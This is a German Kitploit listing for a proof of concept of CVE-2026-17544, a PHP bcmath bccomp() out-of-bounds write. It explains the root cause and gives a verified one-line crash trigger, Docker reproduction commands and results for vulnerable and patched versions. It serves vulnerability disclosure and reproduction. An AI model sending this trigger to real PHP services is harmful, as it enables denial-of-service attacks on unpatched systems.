Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-17544-PoC — CVE-2026-17544 — PHP bcmath bccomp() OOB-Schreibzugriff (Stack-Smashing). Verifiziert: Absturz unter 8.4.23/8.5.8, behoben in 8.4.24. GHSA-x692-q9x7-8c3f | Kitploit
Tools/GitHubGitHub/boreas37/cve-2026-17544-poc
SchwachstellenanalyseExploitationBinary-Exploitation
GitHubboreas37/cve-2026-17544-poc

CVE-2026-17544-PoC

CVE-2026-17544 — PHP bcmath bccomp() OOB-Schreibzugriff (Stack-Smashing). Verifiziert: Absturz unter 8.4.23/8.5.8, behoben in 8.4.24. GHSA-x692-q9x7-8c3f

Repository anzeigen
631vor 28 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-17544 — PHP bcmath bccomp() Out-of-Bounds-Write (Stack-Smashing)

CVSS 9.8 (Kritisch) · CWE-787 · GHSA-x692-q9x7-8c3f

Zusammenfassung

bc_str2num() in ext/bcmath/libbcmath/src/str2num.c (mitgeliefertes libbcmath, PHP 8.4+) enthält einen Off-by-N-Out-of-Bounds-Write. Wenn die vom Benutzer angegebene scale kleiner ist als die automatische Skala des Operanden, wird der Nachkommateil abgeschnitten und anschließend ein Trimmen nachgestellter Nullen ausgeführt, ohne fractional_end zu aktualisieren. Der Puffer wird für die getrimmte (kürzere) Länge alloziert, die Kopie verwendet jedoch die ungetrimmte Länge → Heap-/Stack-Pufferüberlauf.

Betroffen: PHP 8.4.* < 8.4.24, 8.5.* < 8.5.9 Behoben: PHP 8.4.24 / 8.5.9 (30.07.2026), Commits fa18dab73f93 / Recep Asan (recepasan)

ce2ec8a70755
Gemeldet von:

Grundursache

root@kitploit:~
// ext/bcmath/libbcmath/src/str2num.c — bc_str2num()
str_scale -= fractional_end - fractional_new_end;   // fractional_end NOT updated here
...
bc_new_num_nonzeroed(digits, str_scale)            // allocates SHORT (trimmed) buffer
bc_copy_and_toggle_bcd(nptr, fractional_ptr, fractional_end)  // copies UNTRIMMED length

Der Ein-Zeilen-Fix (fractional_end = fractional_new_end;) sowie der Regressionstest ext/bcmath/tests/GHSA-x692-q9x7-8c3f.phpt wurden in 8.4.24/8.5.9 übernommen.

Auslöser (verifiziert)

root@kitploit:~
bccomp("1." . "9" . str_repeat("0", 300) . "1", "0", 300);
BuildErgebnis
PHP 8.4.23 (verwundbar, Docker php:8.4.23-cli + bcmath)💥 *** stack smashing detected ***, exit 133 (SIGABRT)
PHP 8.5.8 (verwundbar)💥 dasselbe — deterministischer Abbruch
PHP 8.4.24 (gepatcht, php:8.4.24-cli)✅ int(1), exit 0

Verifiziert am 12.08.2026 auf einem Raspberry Pi 5 (arm64) per Docker.

Verwendung

root@kitploit:~
# Vulnerable PHP:
docker run --rm -v "$PWD":/app -w /app php:8.4.23-cli sh -c \
  'docker-php-ext-install bcmath >/dev/null 2>&1 && php trigger.php'
# -> stack smashing detected (exit 133)

# Patched PHP:
docker run --rm -v "$PWD":/app -w /app php:8.4.24-cli sh -c \
  'docker-php-ext-install bcmath >/dev/null 2>&1 && php trigger.php'
# -> int(1), exit 0

Auswirkungen

  • Remote-DoS: Jeder Dienst, der angreiferkontrollierte Operanden/Skalen an bccomp() übergibt, kann deterministisch zum Absturz gebracht werden (8.4/8.5; Stack-Protector-Builds brechen ab; nicht geschützte Builds korrumpieren gespeicherte Register/Rücksprungadresse).
  • RCE: Theoretisch möglich per Heap-Grooming, aber die OOB-Bytes sind auf BCD-Werte (0x00–0x09) beschränkt und die Überlaufgröße entspricht der Anzahl getrimmter Nullen — schwierig, nicht demonstriert.

Referenzen

  • GHSA: https://github.com/php/php-src/security/advisories/GHSA-x692-q9x7-8c3f
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-17544
  • Fix 8.4: fa18dab73f93 · Fix 8.5: ce2ec8a70755
Tool herunterladen